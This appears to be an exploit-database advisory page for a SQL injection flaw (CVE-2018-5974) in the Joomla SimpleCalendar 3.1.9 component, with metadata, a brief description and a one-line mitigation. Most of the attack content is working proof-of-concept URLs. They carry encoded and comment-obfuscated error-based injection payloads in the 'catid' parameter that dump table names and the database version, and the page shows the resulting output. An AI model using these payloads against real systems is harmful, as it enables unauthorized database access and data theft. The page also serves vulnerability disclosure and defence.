Joomla! Component SimpleCalendar 3.1.9 - SQL Injection

vendor:

SimpleCalendar

by:

Ihsan Sencan

9.8

CVSS

CRITICAL

SQL Injection

CWE

Product Name: SimpleCalendar

Affected Version From: 3.1.9

Affected Version To: 3.1.9

Patch Exists: YES

Related CWE: CVE-2018-5974

CPE: a:albonico:simplecalendar:3.1.9

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: WiN7_x64/KaLiLinuX_x64

2018

Joomla! Component SimpleCalendar 3.1.9 – SQL Injection

Joomla! Component SimpleCalendar 3.1.9 is vulnerable to SQL Injection. An attacker can exploit this vulnerability to inject malicious SQL queries into the application and gain access to sensitive data. The vulnerability exists due to insufficient sanitization of user-supplied input in the 'catid' parameter of the 'index.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request with malicious SQL code to the vulnerable application. Successful exploitation of this vulnerability can result in unauthorized access to sensitive data, modification of data, and even server compromise.

Mitigation:

Developers should always sanitize user-supplied input and use parameterized queries to prevent SQL injection attacks.

Source

Exploit-DB raw data:

# # # #
# Exploit Title: Joomla! Component SimpleCalendar 3.1.9 - SQL Injection
# Dork: N/A
# Date: 16.02.2018
# Vendor Homepage: http://albonico.ch/
# Software Link: http://software.albonico.ch/downloads/file/3-simplecalendar-3-1-9.html
# Version: 3.1.9
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-5974
# # # #
# Exploit Author: Ihsan Sencan 
# # # # 
# 
# POC:
# 
# 1)
# http://localhost/[PATH]/index.php?option=com_simplecalendar&view=events&catid[0]=[SQL]
#  
# JTI4JTU1JTUwJTQ0JTQxJTU0JTQ1JTU4JTRkJTRjJTI4JTMwJTJjJTJmJTJhJTIxJTMwJTMxJTMxJTMxJTMxJTQzJTRmJTRlJTQzJTQxJTU0JTJhJTJmJTI4MHgyZSUyYyU3NiU2NSU3MiU3MyU2OSU2ZiU2ZSUyOCUyOSUyYzB4N2U3ZTdlN2UlMmMlMjglNTMlNDUlNGMlNDUlNDMlNTQlMjAlMjglNDUlNGMlNTQlMjglMzYlMzYlM2QlMzYlMzYlMmMlMzElMjklMjklMjklMmMlNjQlNjElNzQlNjElNjIlNjElNzMlNjUlMjglMjklMjklMmMyOTI1JTI5JTI5
# 
# http://localhost/[PATH]/index.php?option=com_simplecalendar&view=events&catid[VerAyari]=[SQL]
# 
# KC8qITAyMjI1VVBEQVRFWE1MKi8oNjYsQ09OQ0FUKDB4M2EsKC8qITAyMjI1U0VMRUNUKi8rR1JPVVBfQ09OQ0FUKHRhYmxlX25hbWUrU0VQQVJBVE9SKzB4M2EpK0ZST00rSU5GT1JNQVRJT05fU0NIRU1BLlRBQkxFUysvKiEwMjIyNVdIRVJFKi8rVEFCTEVfU0NIRU1BPURBVEFCQVNFKCkpLChFTFQoMT0xLDEpKSksMSkp
# 
# # # #

http://localhost/Joomla375/index.php?option=com_simplecalendar&view=events&catid[VerAyari]=(/*!02225UPDATEXML*/(66,CONCAT(0x3a,(/*!02225SELECT*/+GROUP_CONCAT(table_name+SEPARATOR+0x3a)+FROM+INFORMATION_SCHEMA.TABLES+/*!02225WHERE*/+TABLE_SCHEMA=DATABASE()),(ELT(1=1,1))),1))

http://localhost/Joomla375/index.php?option=com_simplecalendar&view=events&catid[0]=%28%55%50%44%41%54%45%58%4d%4c%28%30%2c%2f%2a%21%30%31%31%31%31%43%4f%4e%43%41%54%2a%2f%280x2e%2c%76%65%72%73%69%6f%6e%28%29%2c0x7e7e7e7e%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%36%36%3d%36%36%2c%31%29%29%29%2c%64%61%74%61%62%61%73%65%28%29%29%2c2925%29%29
 XPATH syntax error: '10.1.21-MariaDB~~~~1joomla375' XPATH syntax error: '10.1.21-MariaDB~~~~1joomla375'